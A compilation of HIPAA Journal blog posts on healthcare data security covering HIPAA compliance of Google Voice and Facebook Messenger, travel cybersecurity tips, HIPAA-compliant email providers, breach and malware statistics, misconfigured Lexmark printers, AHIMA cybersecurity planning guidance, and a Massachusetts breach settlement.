Healthcare Data Security

Is Google Voice HIPAA Compliant?

Posted by HIPAA Journal

Google Voice is a popular telephony service, but is Google Voice HIPAA compliant or can it be used in a HIPAA compliant way? Is it possible for healthcare organizations – or healthcare employees – to use the service without risking a violation of HIPAA Rules?

Is Google Voice HIPAA Compliant?

Google Voice is a popular and convenient telephony service that includes voicemail, voicemail transcription to text, the ability to send text messages free of charge, and many other useful features. It is therefore unsurprising that many healthcare professionals would like to use the service at work, as well as for personal use.

In order for a service to be used in healthcare in conjunction with any protected health information (PHI) it must be possible to use it in a HIPAA compliant way.

That means the service must be covered by the conduit exemption rule – which was introduced when the HIPAA Omnibus Final Rule came into effect – or it must incorporate a range of controls and safeguards to meet the requirements of the HIPAA Security Rule.

As with SMS, faxing and email, Google Voice is not classed as a conduit which means that in order for Google Voice to be HIPAA compliant, the service would need to satisfy the requirements of the HIPAA Security Rule.

There would need to be access and authentication controls, audit controls, integrity controls, and transmission security for messages sent through the service. Google would also need to ensure that any data stored on its servers are safeguarded to the standards demanded by HIPAA. HIPAA-covered entities would also need to receive satisfactory assurances that is the case, in the form of a HIPAA-compliant business associate agreement (BAA).

Therefore, before Google Voice could be used in conjunction with any protected health information, the covered entity must obtain a BAA from Google.

Will Google Sign A BAA for Google Voice?

Google is keen to encourage healthcare organizations to adopt its services, and is happy to sign a business associate agreement for G Suite, but Google does not include its free consumer services in that agreement. Google does not recommend businesses use its free consumer services for business use, as they have been developed specifically for consumers for personal use.

Google Voice is a consumer product and is not included in G Suite, Google Apps, or Google Cloud and neither is it mentioned in its BAA.

So is Google Voice HIPAA compliant? No. Until such point that Google releases a version of Google Voice for businesses, and will include it in its business associate agreement, it should not be used by healthcare organizations or healthcare employees in a professional capacity.

The use of Google Voice with any protected health information would be a violation of HIPAA Rules.

The post Is Google Voice HIPAA Compliant? appeared first on HIPAA Journal.

Cybersecurity Best Practices for Travelling Healthcare Professionals

Posted by HIPAA Journal

In its December cybersecurity newsletter, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) offered cybersecurity best practices for travelling healthcare professionals to help them prevent malware infections and the exposure of patients’ protected health information (PHI).

Many healthcare professionals will be travelling to see their families over the holidays and will be taking work-issued devices with them on their travels, which increases the risk to the confidentiality, integrity, and availability of PHI.

Using work-issued laptops, tablets, and mobile phones in the office or at home offers some protection from cyberattacks and malware infections. Using the devices to connect to the Internet at cafes, coffee shops, hotels, and other Wi-Fi access points increases the risk of a malware infection or man-in-the-middle attack. Even charging portable devices via public USB charging points at hotels and airports can see malware transferred.

Not only will malware and cyberattacks potentially result in data on the device being exposed, login credentials can be stolen leading to a substantial data breach, or malware can be transferred to your organization’s network when you return to work.

Ensure Travel is Covered in Your Risk Analysis

HIPAA-covered entities and business associates must conduct a risk analysis to identify all risks to the confidentiality, integrity, and availability of PHI. The risk analysis must include the risks when healthcare professionals travel, be it on holiday or for business trips. Vulnerabilities and risks identified by the risk assessment must then be managed and reduced to an acceptable and appropriate level through a HIPAA-compliant risk management process.

OCR’s Suggested Cybersecurity Best Practices for Travelling Healthcare Professionals

The following cybersecurity best practices for travelling healthcare professionals are particularly relevant during the holiday season, but apply whenever work-issued devices are removed from the protection of a secured network.

Healthcare organizations that permit healthcare employees to remove work-issued devices should incorporate these cybersecurity best practices into their training programs and ensure all healthcare employees are made aware of the additional risks when travelling and how they can manage those risks.

Leave Portable Devices at the Office or at Home

If you don’t really need to take a work-issued device with you, leave it at home or at the office and make sure it is secured.

Ensure Devices are Fully Patched

All portable devices should be kept patched and up to date, although this becomes even more important when travelling and connecting to public Wi-Fi hotspots. Software, mobile apps, and operating systems should be updated to the latest versions.

Secure the Devices Using Strong Passwords

All devices should be secured with strong passwords. OCR suggests passwords should be more than 10 characters and should include numbers, letters (upper and lower case) and symbols. Passphrases can be used as they are difficult to guess but easy to remember. Multi-factor authentication should also be used if possible.

Activate Additional Security Controls

Activate additional security controls such as fingerprint readers on mobile phones to prevent data and account access in the event of loss or theft. This can buy you more time to secure accounts and change passwords if your device is stolen.

Encrypt all Sensitive Data on Your Devices

OCR suggests laptop computers should have full disk encryption to ensure data cannot be accessed in the event of loss or theft, and to remove data from portable devices if it is not required.

Create Multiple Backups of Files

It is essential that data can be recovered in the event of loss or theft of a portable device or a ransomware attack. Multiple backups should ideally be created on another device with a copy also stored securely in the cloud.

Bring Portable Chargers, Power Cords and Adaptors

Connecting to public charging points in airports and hotels can easily introduce malware. Avoid USB charging points, and charge devices using a portable charging pack or by plugging into the mains supply. If charging ports must be used, only connect after devices have been powered down.

Avoid Public Wi-Fi Hotspots

Avoid all public Wi-Fi networks as they are unlikely to be secure. If you do need to connect to Wi-Fi when travelling, always connect to the Internet via a VPN.

Turn Off Auto Connect for Bluetooth and Wi-Fi

Ensure your portable devices do not automatically connect to Wi-Fi networks and turn off Bluetooth connectivity.

Use Different PIN Numbers

Always use a unique PIN number for each of your devices. Never reuse a PIN anywhere else, such as on the hotel safe.

Never Leave Devices Unprotected

If you cannot lock a portable electronic device in a safe, take it with you. Any possible hiding spot in a hotel room will be checked by thieves. Devices should only ever be taken in hand luggage, never packed in a case that is put in the hold.

Use Geo-Location with Care

While geolocation services have their uses, they can also alert thieves that you are not at home. Consider turning off these services on social media networks when you are away, and avoid posting photos taken on your travels until you return home.

The post Cybersecurity Best Practices for Travelling Healthcare Professionals appeared first on HIPAA Journal.

Is Facebook Messenger HIPAA Compliant?

Posted by HIPAA Journal

Is Facebook Messenger HIPAA compliant? Is it OK to use the messaging service to send protected health information without violating HIPAA Rules?

Many doctors and nurses communicate using chat platforms, but is it acceptable to use the platforms for sending PHI? One of the most popular chat platforms is Facebook Messenger. To help clear up confusion we will assess whether Facebook Messenger is HIPAA compliant and if the platform can be used to send PHI.

In order to use any service to send PHI, it must incorporate security controls to ensure information cannot be intercepted in transit. In sort, messages need to be encrypted. Many chat platforms, including Facebook Messenger, do encrypt data in transit, so this aspect of HIPAA is satisfied. However, with Facebook Messenger, encryption is optional and users have to opt in. Provided that setting has been activated, only the sender and the receiver will be able to view the messages. However, there is more to HIPAA compliance than simply encrypting data in transit.

There must be access and authentication controls to ensure only authorized individuals can access the program. Facebook Messenger could be accessed by unauthorized individuals if a phone was stolen, so it would be necessary for the device to have additional security controls to ensure apps such as Facebook Messenger could not be accessed in the event of loss or theft. Facebook Messenger users don’t have to login each time to view messages on the app.

HIPAA-covered entities must ensure there is an audit trail. Any PHI sent through a chat messaging platform would need to be retained and hardware, software or procedural mechanisms would be required to ensure any activity involving PHI could be examined. It would be difficult to maintain an audit trail on Facebook Messenger and there are also no controls to prevent messages from being deleted by users.

Is a Business Associate Agreement Required?

The HIPAA Conduit Exception allows HIPAA-covered entities to send information via certain services without the need for a business associate agreement. For example, it is not necessary to enter into a BAA with an Internet Service Provider (ISP) or the U.S. Postal Service. Those entities only act as conduits.

However, cloud service providers are not covered by that exception. HHS points this out on its website, saying “CSPs that provide cloud services to a covered entity or business associate that involve creating, receiving, or maintaining (e.g., to process and/or store) electronic protected health information (ePHI) meet the definition of a business associate, even if the CSP cannot view the ePHI because it is encrypted and the CSP does not have the decryption key.”

Facebook would therefore need to sign a BAA with a HIPAA-covered entity before Facebook Messenger could be used to communicate PHI, and at the time of writing, Facebook is not prepared to sign a BAA for its Messenger service.

How About Workplace by Facebook?

Workplace by Facebook is a messaging service that can be used by businesses to communicate internally. Is Workplace by Facebook HIPAA compliant? The Workplace Enterprise Agreement states under its prohibited data section, “You agree not to submit to Workplace any patient, medical or other protected health information regulated by HIPAA or any similar federal or state laws, rules or regulations (“Health Information”) and acknowledge that Facebook is not a Business Associate or subcontractor (as those terms are defined in HIPAA) and that Workplace is not HIPAA compliant.”

Is Facebook Messenger HIPAA Compliant?

Is Facebook Messenger HIPAA compliant? Without a BAA, and without appropriate audit and access controls, we do not believe Facebook Messenger is HIPAA compliant. If you want to use a chat program for communicating PHI, we suggest you use a HIPAA-compliant messaging service that has been developed specifically for the healthcare industry. TigerText for example. These secure healthcare text messaging solutions incorporate all the necessary controls to ensure PHI can be sent securely, and include access controls, audit controls, and full end-to-end encryption.

The post Is Facebook Messenger HIPAA Compliant? appeared first on HIPAA Journal.

HIPAA Compliant Email Providers

Posted by HIPAA Journal

HIPAA-covered entities must ensure protected health information (PHI) transmitted by email is secured to prevent unauthorized individuals from intercepting messages, and many choose to use HIPAA compliant email providers to ensure appropriate controls are applied to ensure the confidentiality, integrity, and availability of PHI.

There are many HIPAA compliant email providers to choose from that provide end-to-end encryption for messages. Some of the solutions require software to be hosted on your own infrastructure; others take care of everything. Changing email provider does not necessarily mean you have to change your email addresses. Many services allow you to keep your existing email addresses and send messages as you normally would from your desktop.

All HIPAA compliant email providers must ensure their solution incorporates all of the safeguards required by the HIPAA Security Rule. The solutions need to have access controls 164.312(a)(1), audit controls 164.312(b), integrity controls 164.312(c)(1), authentication 164.312(d), and PHI must be secured in transit 164.312(e)(1).

Provided that an email service provider incorporates all of those controls, the service can be considered HIPAA-compliant. However, it is also necessary for an email service provider to enter into a contract with a HIPAA-covered entity in the form of a business associate agreement. Only then can the email service be used.

HIPAA-covered entities should bear in mind that HIPAA-compliant email is not the responsibility of the service provider. The service provider must only ensure appropriate safeguards are incorporated. It is the responsibility of the covered entity to ensure the solution is configured correctly, that staff are trained on the use of email and are made aware of the allowable uses and disclosures of PHI.

An email service alone will not satisfy all HIPAA requirements for email. Staff should also receive training on security awareness and be made aware of the threats that can arrive in inboxes. Technologies should also be implemented to reduce the risk of email-based attacks such as phishing. Some email service providers, but not all, scan inbound messages and block spam, malware and phishing emails.

Is Encryption for Email Mandatory?

That is a question asked by many healthcare organizations. While HIPAA compliant email providers encrypt all emails in transit, encryption is not mandatory. The HIPAA Security Rule only requires organizations to assess the need for encryption. A HIPAA-covered entity does not need to encrypt emails, if an alternative and equivalent control is used in its place.

One such control is the use of a secure email server located behind a firewall. In such cases, provided a risk assessment has been conducted and the reasons for not encrypting emails has been documented, encryption would not be required on all internal emails. Encryption would also not be necessary when sending emails to patients who have authorized a covered entity to communicate with them via email.

However, since most healthcare organizations need to submit payment claims via email, contact other healthcare organizations and refer patients, it is necessary to send emails outside the protection of the firewall. In such cases, encryption is necessary.

There are considerable risks sending sensitive information via email. Email is not a secure way of sending data. Emails must be created on one machine, be sent to an outbound email server, traverse the Internet, arrive at the recipient’s email server, before being delivered to the recipient’s device. Copies of emails can be on at least four different machines, and messages can easily be intercepted in transit.

The Department of Health and Human Services has already issued fines to covered entities that have used email services that are not HIPAA compliant. Phoenix Cardiac Surgery paid a $100,000 penalty for using insecure Internet-based email.

List of HIPAA Compliant Email Providers

Our list of HIPAA compliant email providers has been compiled to save you time in your search for a suitable email service provider. The list of HIPAA compliant email providers is not exhaustive. There are many other service providers that offer email services for healthcare organizations that meet the requirements of HIPAA. However, the list below is a good starting point.

All of the following providers offer a HIPAA-compliant email service and are willing to sign a business associate agreement.

  • Hushmail for Healthcare
  • VM Racks
  • NeoCertified
  • Paubox
  • Virtru
  • Atlantic
  • LuxSci
  • Apsida Mail
  • Protected Trust
  • MaxMD
  • EmailPros
  • MD OfficeMail
  • Delivery Trust from Identillect Technologies

The post HIPAA Compliant Email Providers appeared first on HIPAA Journal.

Protenus Releases November Healthcare Data Breach Report

Posted by HIPAA Journal

Protenus has released its November healthcare data breach report – a summary of healthcare data breaches reported by HIPAA-covered entities. The report shows there has been a month on month fall in healthcare data breaches, and a major reduction in the number of records exposed by data breaches.

November saw the lowest total of the year to date for breaches with 28 incidents included in the report – four incidents fewer than February, the previous best month when 32 breaches were reported. This is the second consecutive month when reported breaches have fallen. There were 46 breaches reported in September and 37 in October.

November was also the best month of the year in terms of the number of records exposed. 83,925 individuals were impacted by healthcare data breaches in November. The previous lowest total was May, when 138,957 records were exposed. November was the third consecutive month where the number of breached records fell.

While the November healthcare data breach report offers some good news, the fall in breaches and breached records should be taken with a large pinch of salt. Healthcare organizations have a maximum of 60 days to report breaches, so the figures do not indicate there has been a reduction in incidents. Also, figures have only been obtained for 25 of the 28 breaches. As Kira Caban, Director of Public Relations at Protenus, notes, “The number of both data breach incidents and affected patient records are lower than any other month thus far in 2017, but it may also just indicate that people wanted to get ready for Thanksgiving, so they delayed reporting.”

In November, insider breaches outnumbered hacking incidents with nine incidents (32%) due to insiders with eight incidents attributed to hacking (28%). 25% of breaches involved the loss or theft or records or devices containing ePHI. Seven of the breaches involved paper records.

The November healthcare data breach report shows hacking incidents resulted in the highest number of exposed records by a nose -36,804 records. Insider incidents resulted in the exposure of 36,447 records: 27,228 due to insider error and 9,219 due to insider wrongdoing. 5,324 records were exposed due to the theft or loss of physical records or devices containing unencrypted ePHI.

As is typical, healthcare providers reported the most breaches (82.1%), followed by health plans (10.7%). Three incidents (3.6%) are known to have involved business associates of HIPAA-covered entities.

It is difficult to make a determination whether healthcare organizations managed to discover breaches more quickly, as figures were only available for four incidents. The average time to detect a breach was 55 days, with a median of 33 days. One breach took 153 days to discover.

Data are better for the time to report breaches. The median time to report the incidents to HHS was 57 days, with an average time of 61 days. The figures show healthcare organizations are still waiting until the last minute to report breaches. It should be noted that while HIPAA allows up to 60 days to report data breaches, incidents should be reported without unnecessary delay, and well within that 60-day window.  At least three covered entities have risked a financial penalty for delayed breach notifications, with one taking 134 days to report the breach.

While California is usually the state with the most reported breaches, that unenviable accolade was taken by Kentucky in November, with three reported breaches. Healthcare organizations based in Massachusetts, Texas, Colorado, Indiana, Florida, and California each reported two breaches.

The post Protenus Releases November Healthcare Data Breach Report appeared first on HIPAA Journal.

New Malware Detections at Record High: Healthcare Most Targeted Industry

Posted by HIPAA Journal

Throughout 2017, the volume of new malware samples detected by McAfee Labs has been steadily rising each quarter, reaching a record high in Q3 when 57.6 million new malware samples were detected. On average, in Q3 a new malware sample was detected every quarter of a second.

In the United States, the healthcare industry continues to be the most targeted vertical, which along with the public sector accounted for more than 40% of total security incidents in Q3. In Q3, account hijacking was the main attack vector, followed by leaks, malware, DDoS, and other targeted attacks.

There were similar findings from the recent HIMSS Analytics/Mimecast survey which showed email related phishing attacks were the greatest cause of concern among healthcare IT professionals, with email the leading attack vector.

In Q3, globally there were 263 publicly disclosed security breaches – a 15% increase from last quarter – with more than 60% of those breaches occurring in the Americas. Malware attacks increased 10% since last quarter bringing the total new malware samples in the past four quarters to 781 million – a 27% increase in the space of a year.

Ransomware continues to be a favored moneymaker for cybercriminals, with the number of new ransomware samples increasing by 36% in Q3 – 14% more than the previous quarter. In total, 12.2 million samples of ransomware were detected – a 44% increase over the past four quarters.  One notable ransomware variant was Lukitus – a new form of Locky ransomware that appeared in Q3. The campaign detected by McAfee involved an astonishing 23 million spam emails in the first 24 hours alone.

While not the biggest threat in Q3, fileless malware threats are still a major cause for concern. Script-based malware – written in VBS, JavaScript, PowerShell or PHP – has been steadily increasing over the past two years. The malware is easy to obfuscate and difficult to detect, and is increasingly being used in malware campaigns, with some campaigns consisting entirely of script-based malware.

McAfee reports that while there was a 36% fall in JavaScript malware since Q2, the level is still higher than at any point in 2016 and Q3 saw a 119% increase in PowerShell malware.

“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”

There was also a notable rise in mobile malware, with 21.1 million samples detected – 10% higher than Q2, the increase was largely due to a major rise in Android screen-locking ransomware variants. Macro malware increased by 8% in Q3, while Mac malware saw an increase of 7%. Web-based threats also increased significantly in Q3.

While malware continues to be a major threat, the Carbon Black’s 2017 Threat Report indicates 52% of attacks are non-malware related. Non-malware attacks are now increasing at a rate of 6.8% per month.

The financial services, healthcare providers, and retail stores were the verticals most affected by malware-related cyberattacks in 2017 according to Carbon Black. The main threats are the Kryptik Trojan, Strictor ransomware, the Nemucod downloader, the Emotet banking Trojan, and the Skeeyah Trojan. Carbon Black reports a 328% increase in attacks on endpoints in 2017 alone.

While the healthcare industry has had its fair share of ransomware attacks, it is well down the list of industries targeted with ransomware, coming in 9th out of 10 industries with just 4.6% of the total. The leading targets being tech firms, government organizations/NPOs and legal firms.

Ransomware will continue to be the dominant form of cybercrime in 2018, according to the report. Carbon Black estimates revenues from ransomware will rise to $5 billion by the end of the year, compared to just $24 million in 2015.

The post New Malware Detections at Record High: Healthcare Most Targeted Industry appeared first on HIPAA Journal.

More than 1,000 Lexmark Printers Open to Attack Due to Misconfiguration

Posted by HIPAA Journal

Researchers at NewSky Security have discovered more than a thousand Lexmark printers have been misconfigured by users and are accessible over the Internet. Many of the printers are used businesses, universities, and even the U.S. Government, yet they can be accessed via the Internet without the need for a password.

The lack of security means unauthorized individuals can connect to the printers, which in some cases are connected to sensitive networks. Attacking those printers requires no skill and is a quick and easy process. Any individual can remotely access and take full control of the device. It would be possible for anyone to set a password for the printer, add a backdoor and capture print jobs. NewSky Security says the lack of an administrator password is gross negligence by users.

The researchers identified the misconfigured Lexmark printers by performing a search on the search engine Shodan. Of the 1,475 unique IPs found, 1,123 printers had no security at all and only 24% redirected the researchers to a login page. The researchers explained, “an attacker can take control of these poorly configured devices without any impressive hacking skills.”

One of the unsecured printers was being used by the Lafayette Consolidated Government, with the majority belonging to universities. NewSky is currently reaching out to organizations affected to alert them to the problem.

The researchers explained that they have focused on printer security because it is still largely neglected by end users.

This is not the first time printer misconfigurations have been discovered by the researchers. Similar misconfigurations were identified on Brother printers in October, which saw administrative panels accessible over ports 80 and 443.

It is possible that many other brands of Internet-enabled printers are similarly exposed. Organizations that have purchased Internet-enabled printers should ensure that the devices are configured correctly, that they are isolated from the public Internet, that default passwords are changed, and strong admin passwords set on the devices. Open ports should be closed and unnecessary services stopped.

The post More than 1,000 Lexmark Printers Open to Attack Due to Misconfiguration appeared first on HIPAA Journal.

AHIMA Issues Guidance to Help Healthcare Organizations Develop an Effective Cybersecurity Plan

Posted by HIPAA Journal

The American Health Management Association (AHIMA) has published guidance to help healthcare organizations develop a comprehensive and effective cybersecurity plan.

In the guidance, AHIMA explains that healthcare organizations must develop, implement and maintain an organization-wide framework for managing information through its entire lifecycle, from its creation to its safe and secure disposal – Termed information governance (IG).

As the Protenus/Databreaches.net monthly healthcare data breach reports show, healthcare data breaches are now occurring at a rate of more than one a day. With the threat of attack greater than ever before, it is essential that healthcare organizations develop an IG program.

Kathy Downing, Vice President, Information Governance, Informatics, Privacy and Security at AHIMA, explains that IG is now critical in an environment where cyberattacks are being experienced by healthcare organizations every day.

Downing cites the June 2017 report from the Healthcare Industry Cybersecurity Taskforce (HCIC), which states “Information governance includes not just IT and security stakeholders, but also information stakeholders, clinical and nonclinical leaders.” HCIC explained, “Governance of information shifts the focus from technology to people, processes, and the policies that generate, use, and manage the data and information required for care.”

To help healthcare organizations, develop, implement, and maintain an effective IG program, AHIMA has developed its step by step guide, which includes 17 actions healthcare organizations can take to complete a cybersecurity plan.

The AHIMA IG Adoption Model™ addresses people, processes, and technology and has been based on ten competency areas, including privacy and security, enterprise information management, IT and data governance, legal and regulatory requirement, and security awareness and adherence.

By developing and maintaining a cybersecurity plan, healthcare organizations can improve their defenses against cyberattacks and prevent costly data breaches.

The 17 steps to develop a complete cybersecurity plan are:

  1. Conduct a comprehensive, organization-wide risk analysis of all applications and systems
  2. Recognize health record retention as a cybersecurity issue
  3. Patch all vulnerable systems and keep software/operating systems up to date
  4. Deploy advanced endpoint detection systems in addition to standard antivirus/antimalware tools
  5. Encrypt data on workstations, smartphones, tables and portable media
  6. Improve access management and identity controls
  7. Use web filters to block bad traffic
  8. Implement mobile device management
  9. Develop an incident response plan
  10. Monitor audit logs for signs of possible attacks
  11. Implement intrusion detection systems
  12. Evaluate business associates
  13. Use a third-party firm to conduct penetration tests
  14. Improve anti-phishing controls and conduct phishing simulation exercises
  15. Prepare a ‘State of the Union’ type presentation for an organization’s leaders on cybersecurity
  16. Adopt and ally a ‘Defense in Depth’ strategy
  17. Detect and prevent intrusions

Developing and implementing a cybersecurity plan is only the start. The threat landscape is constantly changing, and healthcare organizations’ IT infrastructures, hardware and software frequently change. It is therefore important to revisit and revise the cybersecurity plan, as appropriate, at least every quarter to ensure it remains comprehensive and effective.

The AHIMA guidance is available for download here.

The post AHIMA Issues Guidance to Help Healthcare Organizations Develop an Effective Cybersecurity Plan appeared first on HIPAA Journal.

Medicaid Billing Company Settles Data Breach Case with Mass. Attorney General for $100,000

Posted by HIPAA Journal

A data breach experienced by New Hampshire-based Multi-State Billing Services (MBS) has resulted in a $100,000 settlement with the Massachusetts attorney general’s office.

MBS is a Medicaid billing company that provides processing services for 13 public school districts in Massachusetts –  Ashburnham-Westminster Regional, Bourne, Foxboro Regional Charter, Milford, Nauset Public Schools, Norfolk, Northborough-Southborough Regional, Plainville, Sutton, Truro, Uxbridge, Wareham, and Whitman-Hanson Regional.

In 2014, MBS learned that a password-protected, unencrypted laptop computer containing the sensitive personal information of Medicaid recipients had been stolen from a company employee. Data stored on the device included names, Social Security numbers, Medicaid numbers, and birth dates. As a result of the laptop theft, more than 2,600 Massachusetts children had their sensitive information exposed.

Following the data breach, MBS notified all affected individuals and offered to reimburse costs related to security freezes for three years following the breach. Security was also enhanced, including the use of encryption on all portable computers used to store the sensitive information of Medicaid recipients.

The Massachusetts attorney general’s office investigated the breach and determined that insufficient protections had been employed to ensure this type of breach did not occur. Under state law, companies doing business in Massachusetts must take “reasonable steps to safeguard the personal information from unauthorized access or use.” Had those measures been implemented prior to the laptop theft, a breach of sensitive information could have been avoided.

Specifically, MBS had failed to develop, implement, and maintain a written security information program, and did not ensure sensitive personal information stored on portable electronic devices was encrypted. MBS had also failed to train staff how to reasonably safeguard personal information.

A consent judgement against MBS was obtained by Massachusetts attorney General Maura Healey. That judgement requires MBS to pay a financial penalty and develop, implement, and maintain a comprehensive information security program and train staff how to handle and safeguard personal information.

Attorney general Healey said, “This settlement ensures that this company implements the necessary protections so this type of breach never happens again and sends a clear message about the importance of safeguarding the sensitive information of children and others.”

The post Medicaid Billing Company Settles Data Breach Case with Mass. Attorney General for $100,000 appeared first on HIPAA Journal.